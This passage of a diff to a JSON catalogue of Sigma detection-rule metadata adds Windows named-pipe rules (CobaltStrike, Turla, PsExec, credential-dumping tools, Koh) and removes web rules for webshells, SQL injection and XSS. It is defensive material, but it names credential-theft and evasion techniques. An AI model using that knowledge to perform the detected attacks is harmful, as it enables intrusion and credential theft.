"sysmon_config_modification_error.yml", + "level": "high", + "logsource.category": "sysmon_error", + "logsource.product": "windows", + "refs": [ + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error" + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_status.yml", + "level": "high", + "logsource.category": "sysmon_status", + "logsource.product": "windows", + "refs": [ + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification" + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "meta": { + "author": "Florian Roth, Christian Burkard", + "creation_date": "2021/07/30", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe Patterns" + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex" + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes" + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/25", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/253", + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe" + }, + { + "description": "Detects a named pipe used by Turla group samples", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_apt_turla_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/09/12", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." + ], + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe" + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe" + }, + { + "description": "Detects PAExec default named pipe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_paexec_default_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe" + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ] + }, + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created Named Pipe" + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_powershell_execution_pipe.yml", + "level": "informational", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe" + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName" + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_efspotato_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/zcgonvh/EfsPotato", + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe" + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/05/10", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts" + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "meta": { + "author": "Florian Roth, blueteam0ps, elhoim", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", "meta": { "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Unstable application", - "Application that misuses the response codes" - ], - "filename": "web_multiple_susp_resp_codes_single_source.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", - "value": "Multiple Suspicious Resp Codes Caused by Single Client" - }, - { - "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/31", - "falsepositive": [ - "Serious issues with a configuration or plugin" - ], - "filename": "web_nginx_core_dump.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", - "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", - "value": "Nginx Core Dump" - }, - { - "description": "Detects path traversal exploitation attempts", - "meta": { - "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", - "creation_date": "2021/09/25", - "falsepositive": [ - "Happens all the time on systems exposed to the Internet", - "Internal vulnerability scanners" - ], - "filename": "web_path_traversal_exploitation_attempt.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", - "value": "Path Traversal Exploitation Attempts" - }, - { - "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/12/17", + "creation_date": "2017/06/12", "falsepositive": [ "Unknown" ], - "filename": "web_solarwinds_supernova_webshell.yml", + "filename": "pipe_created_psexec_default_pipe.yml", + "level": "low", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe" + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2021/10/08", + "falsepositive": [ + "Processes in the filter condition" + ], + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection" + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_koh_default_pipe.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "pipe_created", + "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", - "https://www.anquanke.com/post/id/226029", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ] }, - "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", - "value": "Solarwinds SUPERNOVA Webshell Access" - }, - { - "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/25", - "falsepositive": [ - "Unknown" - ], - "filename": "web_sonicwall_jarrewrite_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access" - ] - }, - "uuid": "6f55f047-112b-4101-ad32-43913f52db46", - "value": "SonicWall SSL/VPN Jarrewrite Exploit" - }, - { - "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", - "meta": { - "author": "James Ahearn", - "creation_date": "2019/06/08", - "falsepositive": [ - "Unknown" - ], - "filename": "web_source_code_enumeration.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", - "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", - "value": "Source Code Enumeration Detection by Keyword" - }, - { - "description": "Detects SQL Injection attempts via GET requests in access logs", - "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali", - "creation_date": "2020/02/22", - "falsepositive": [ - "Java scripts and CSS Files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": "web_sql_injection_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", - "https://brightsec.com/blog/sql-injection-payloads/", - "https://github.com/payloadbox/sql-injection-payload-list", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings" - }, - { - "description": "Detects SSTI attempts sent via GET requests in access logs", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": "web_ssti_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", - "https://github.com/payloadbox/ssti-payloads", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", - "value": "Server Side Template Injection Strings" - }, - { - "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", - "meta": { - "author": "Nasreddine Bencherchali, Tim Shelton", - "creation_date": "2022/07/19", - "falsepositive": [ - "Unknown" - ], - "filename": "web_susp_useragents.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", - "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", - "value": "Suspicious User-Agents Related To Recon Tools" - }, - { - "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/06", - "falsepositive": [ - "Legitimate application and websites that use windows paths in their URL" - ], - "filename": "web_susp_windows_path_uri.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" - ], - "tags": [ - "attack.persistence", - "attack.exfiltration", - "attack.t1505.003" - ] - }, - "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", - "value": "Suspicious Windows Strings In URI" - }, - { - "description": "Detects access to DEWMODE webshell as described in FIREEYE report", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_unc2546_dewmode_php_webshell.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", - "value": "DEWMODE Webshell Access" - }, - { - "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/04", - "falsepositive": [ - "Web applications that use the same URL parameters as ReGeorg" - ], - "filename": "web_webshell_regeorg.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", - "https://github.com/sensepost/reGeorg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", - "value": "Webshell ReGeorg Detection Via Web Logs" - }, - { - "description": "Detects Windows Webshells that use GET requests via access logs", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2017/02/19", - "falsepositive": [ - "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", - "User searches in search boxes of the respective website" - ], - "filename": "web_win_webshells_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", - "value": "Windows Webshell Strings" - }, - { - "description": "Detects XSS attempts injected via GET requests in access logs", - "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali", - "creation_date": "2021/08/15", - "falsepositive": [ - "JavaScripts,CSS Files and PNG files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": "web_xss_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/payloadbox/xss-payload-list", - "https://portswigger.net/web-security/cross-site-scripting/contexts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", - "value": "Cross Site Scripting Strings" + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes" }, { "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", @@ -13355,834 +3410,6 @@ "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "value": "Mimikatz Use" }, - { - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "meta": { - "author": "Florian Roth, Zach Mathis", - "creation_date": "2020/01/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_audit_cve.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://twitter.com/DidierStevens/status/1217533958096924676", - "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://www.youtube.com/watch?v=ebmW42YYveI", - "https://nullsec.us/windows-event-log-audit-cve/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "value": "Audit CVE Event" - }, - { - "description": "This detection method points out highly relevant Antivirus events", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2017/02/19", - "falsepositive": [ - "Some software piracy tools (key generators, cracks) are classified as hack tools" - ], - "filename": "win_av_relevant_match.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", - "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", - "value": "Relevant Anti-Virus Event" - }, - { - "description": "An application has been removed. Check if it is critical.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_builtin_remove_application.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", - "value": "Application Uninstalled" - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - 